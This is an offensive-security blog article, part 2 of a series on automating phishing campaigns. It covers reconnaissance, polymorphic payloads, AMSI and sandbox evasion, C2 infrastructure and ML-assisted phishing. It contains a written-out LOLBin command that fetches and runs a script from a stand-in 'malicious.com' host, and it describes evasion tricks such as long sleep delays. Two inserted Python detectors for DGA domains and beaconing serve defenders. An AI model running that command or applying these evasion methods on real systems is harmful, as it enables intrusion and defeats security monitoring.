March 25

Automation in phishing attacks. Part 2

Link to Part 1

Automation of Attacks

As protection methods evolve rapidly, so do attack techniques. At such a crazy pace, there’s no time to do everything manually, which is why automation and optimization are crucial. That’s exactly what this note will focus on.

At the very end, we’ll examine two real-life examples.

Everything starts with reconnaissance.

1. Target System Analysis

This consists of two main reconnaissance stages, similar to those used in pentesting. What methods help us automate routine tasks?

  • PowerShell, bash and nmap scripts, among others
  • Sysinternals tools (e.g., Autoruns, Process Explorer) – automated autostart scanning
  • BloodHound + SharpHound – automated Active Directory analysis (if the target is AD)
  • Living Off The Land Binaries (LOLBins) – built-in system utilities, e.g., for minimizing traces
  • Metasploit, of course
  • Impacket

System information gathering

Malware analyzes:

  • OS version (via API calls such as GetVersionEx on Windows; it is deprecated, so RtlGetVersion() can be used instead)
  • Without the API: wmic os get Caption, Version, BuildNumber
  • Processor architecture
  • Installed software and patches

Detection of protection mechanisms

  • Checks for antivirus, sandboxing, ASLR, DEP
  • Sometimes uses ldd (Linux) / ListDLLs (Windows) for dependency analysis

No need to explain why we gather this information.

Note on OS version without API

Alternative methods for analyzing systems without built-in API usage (e.g., the Windows API) matter when writing malware that must avoid detection (e.g., via Event Tracing for Windows), minimize log traces, or function in environments where API calls are restricted (e.g., sandbox evasion). Example: on Linux, read /proc/version and /etc/os-release instead of running uname -a.

2. Dynamic Attack Modification

This refers to code adapting in real time.

Polymorphism and Encryption

The malware code changes on every launch to bypass antivirus signature detection.

  • Donut: fileless shellcode execution with polymorphism
  • Shellter: injects polymorphic code into executables

Adaptive Payloads:

  • For example, the dropper loads a payload optimized for a specific OS or CPU
  • Defense evasion: dynamically changes attack technique based on detected EDR/AV

Examples:

  1. If the target system is Windows 10 x64 → launch one payload (e.g., Reflective DLL Injection)
  2. If it's Windows Server with Defender → a different payload with an AMSI bypass is chosen
  3. If antivirus is detected → attack is delayed or modified (e.g., API call replacement)

3. Managed Attack Infrastructure

C2 Server (Command & Control) — infrastructure attackers use to remotely manage infected machines, send commands, collect data, and dynamically change attacks in real time. In automated phishing attacks, C2 servers play a key role in scaling and adapting payloads based on the victim’s system.

Types of C2 Architecture:

  • Classic centralized network – targets connect to one server. Easy to detect and block
  • P2P – no central server. E.g., TrickBot or Emotet botnets. Harder to manage
  • DNS tunneling – hides C2 traffic behind legit queries (e.g., iodine, dnscat2)
  • Cloud-based, such as:
    • Slack API – commands via private chats
    • Google Drive / Dropbox – commands via hidden files
    • OneDrive – cloud files used for communication
    • Telegram Bot API – malware controlled via Telegram bots

Modern tools can automate the creation of these systems.

Dynamic C2 Deployment:

  • Terraform + AWS/GCP – auto-deploy C2 via cloud instances
  • Cobalt Strike Infrastructure Automation – automatic proxy/C2/domain setup
  • Merlin – HTTP/3 C2 for stealth attacks

Smart Payloads:

  • After successful phishing, the C2 server automatically analyzes the target system: OS, architecture, antivirus
  • Then sends a dynamically generated payload tailored to the target
  • Automatically switches the attack method if defenses are active

Stealth and Resilience Measures:

  1. CDN usage (Cloudflare, Fastly, AWS CloudFront)
  2. High-reputation domains (google.com, amazonaws.com) used as traffic proxies
  3. Fast Flux and DGA (Domain Generation Algorithms)
  4. Sleep Time & Jitter – the classics
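A defensive counterpart to the Fast Flux/DGA and DNS-tunnelling items above: a small detector, added here as an example and not part of the original note, that scores queried names for DGA-typical traits and reports which clients requested them. The log format, the thresholds and the single-label-TLD assumption are mine.

```python
import math
import re
from collections import Counter, defaultdict

# Constructed DNS query log (not from the article): "<time> <client> <queried name>".
SAMPLE_DNS_LOG = """\
2025-03-25T10:00:01 10.0.0.5 www.example.com
2025-03-25T10:00:02 10.0.0.5 login.microsoftonline.com
2025-03-25T10:00:03 10.0.0.7 xk3j9q2m7zp1vb6.net
2025-03-25T10:00:04 10.0.0.7 q8w2e5r1t9y4u7i.com
2025-03-25T10:00:05 10.0.0.9 cdn.cloudfront.net
"""

CONSONANT_RUN = re.compile(r"[bcdfghjklmnpqrstvwxyz0-9]+")

def shannon_entropy(s):
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def registrable_label(fqdn):
    # Assumption: single-label TLDs (.com, .net); production code would use the public suffix list.
    parts = fqdn.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]

def dga_score(fqdn):
    """Count how many DGA-typical traits the registrable label shows (0..5)."""
    label = registrable_label(fqdn)
    n = len(label)
    digit_ratio = sum(ch.isdigit() for ch in label) / n
    vowel_ratio = sum(ch in "aeiou" for ch in label) / n
    longest_run = max((len(m) for m in CONSONANT_RUN.findall(label)), default=0)
    return sum([
        shannon_entropy(label) > 3.5,   # many distinct characters
        digit_ratio > 0.2,              # letters and digits mixed
        vowel_ratio < 0.2,              # unpronounceable
        longest_run >= 5,               # long consonant/digit runs
        n >= 12,                        # long random-looking label
    ])

def is_dga_like(fqdn, threshold=3):
    return dga_score(fqdn) >= threshold

def scan_dns_log(text):
    """Return {client: [suspicious names]} for lookups that look algorithmically generated."""
    hits = defaultdict(list)
    for line in text.splitlines():
        fields = line.split()
        if len(fields) == 3 and is_dga_like(fields[2]):
            hits[fields[1]].append(fields[2])
    return dict(hits)
```

Legitimate long names such as login.microsoftonline.com score low because their vowel ratio and character distribution stay word-like; tune the thresholds against your own resolver logs before alerting on them.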

4. Use of Machine Learning

Machine Learning is used both for evil and for good.

How attackers optimize using ML:

Prediction of Defense Mechanisms

  • Trained models analyze configurations of AV, EDR, firewalls
  • ML can predict which vulnerabilities or bypass techniques will work on a specific target

User Behavior Analysis

  • Attackers use ML to generate phishing email texts that mimic the victim’s writing style (e.g., via GPT-4)
  • AI bots analyze corporate correspondence to imitate colleagues or managers (BEC attacks)

Automated Malicious Code Generation

  • Generative Adversarial Networks (GANs) generate unique payloads undetectable by signature analysis
  • Example: Modified versions of Cobalt Strike Beacon that evade signature databases

Evasion of Network Traffic Analysis

  • ML generates traffic that mimics legitimate data, reducing C2 detection
  • Examples: DNS tunneling and HTTP(S) C2 evasion via dynamic packet generation

EDR Behavior Analysis Evasion

  • Changing behavioral patterns of malware using generative models to mimic legit processes
  • Malware adapts its behavior to look like normal programs (svchost.exe, explorer.exe)

Automatic Sandbox/Emulator Detection

  • ML algorithms analyze the environment and disable malicious code if it's sandbox-like
  • Example: Checks for unusual hardware specs (low RAM, CPU/GPU inactivity)

But there are also methods of defense that you need to know to get around them.

AI/ML-based Behavioral Monitoring

  • Modern SIEM and EDR systems use ML to detect anomalies
  • Examples: Exabeam, Splunk, Microsoft Defender ATP analyze behavioral signatures

Advanced Network Traffic Analysis

  • DPI + ML detect complex evasion techniques (e.g., odd DNS or TLS tunnels)
  • Example: AI-powered IDS (Zeek, Suricata) detect non-standard data streams

Detection of Polymorphic Malware

  • AV engines (ESET, Kaspersky, CrowdStrike) analyze dynamic behavior
  • ML-powered EDR/AVs detect malicious files by overall behavior, not just signature

That's all great, but can you get around all those defenses? Uh, sure.

1. Emulating Legitimate Behavior

  • Malware mimics system services using LOLBins (e.g., powershell rundll32.exe javascript:"\..\mshtml,RunHTMLApplication" "http://malicious.com/script.js")

2. Execution Delays (Sleep Timing & Jitter)

  • Code waits before launching to avoid sandbox detection (Sleep(600000), a 10-minute delay)
  • Cobalt Strike uses jitter for random C2 communication delays
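Sleep time and jitter (here and in the "Stealth and Resilience Measures" list of section 3) defeat detection that looks for an exact fixed interval, but jittered check-ins still cluster around their base period. The following added example, which is not from the original note, flags flows whose inter-connection gaps have a low coefficient of variation despite jitter; the log format, hosts and thresholds are constructed.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed connection-log lines (not from the article): "<iso time> <src> -> <dst:port>".
# 10.0.0.7 beacons about every 60 s with roughly 20 % jitter; 10.0.0.5 browses irregularly.
def _make_log():
    lines = []
    base = datetime(2025, 3, 25, 10, 0, 0)
    for src, dst, gaps in [
        ("10.0.0.7", "203.0.113.10:443", [60, 52, 68, 57, 63, 49, 71, 55, 65, 58]),
        ("10.0.0.5", "198.51.100.20:443", [5, 120, 2, 900, 30, 3, 400, 1, 60, 15]),
    ]:
        t = base
        lines.append(f"{t.isoformat()} {src} -> {dst}")
        for g in gaps:
            t += timedelta(seconds=g)
            lines.append(f"{t.isoformat()} {src} -> {dst}")
    return "\n".join(lines)

SAMPLE_CONN_LOG = _make_log()
LINE_RE = re.compile(r"^(\S+) (\S+) -> (\S+)$")

def parse_log(text):
    """Group connection timestamps by (src, dst) flow."""
    flows = defaultdict(list)
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            flows[(m.group(2), m.group(3))].append(datetime.fromisoformat(m.group(1)))
    return flows

def beacon_score(times):
    """Return (median gap in seconds, coefficient of variation of the gaps)."""
    times = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    mean = statistics.fmean(gaps)
    cv = statistics.pstdev(gaps) / mean if mean else float("inf")
    return statistics.median(gaps), cv

def detect_beacons(text, min_connections=8, max_cv=0.3):
    """Flag flows whose gaps stay regular (low CV) even with jitter applied."""
    flagged = {}
    for flow, times in parse_log(text).items():
        if len(times) < min_connections:
            continue
        median_gap, cv = beacon_score(times)
        if cv <= max_cv:
            flagged[flow] = {"median_gap_s": median_gap, "cv": round(cv, 3)}
    return flagged
```

Uniform jitter of ±20 % yields a CV near 0.12, well under the 0.3 cut-off, while interactive traffic typically scores above 1; raise min_connections on busy networks to reduce false positives from polling software.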

3. Using ML to Bypass EDR

  • Some malware uses Reinforcement Learning to automatically change strategy upon AV detection
  • Example: AI-powered obfuscation that alters encryption based on AV results

Human Influence: The Role of Social Engineering in Phishing Success

Social engineering is a method of influencing people to manipulate their behavior in order to gain sensitive information or access to resources. In the context of phishing, the human element plays a central role, as attacks are aimed at deceiving users rather than overcoming technical barriers.

Phishing often succeeds not because of flaws in technical defenses, but because of mistakes users make when processing suspicious emails, links or applications.

Part three with specific examples will come later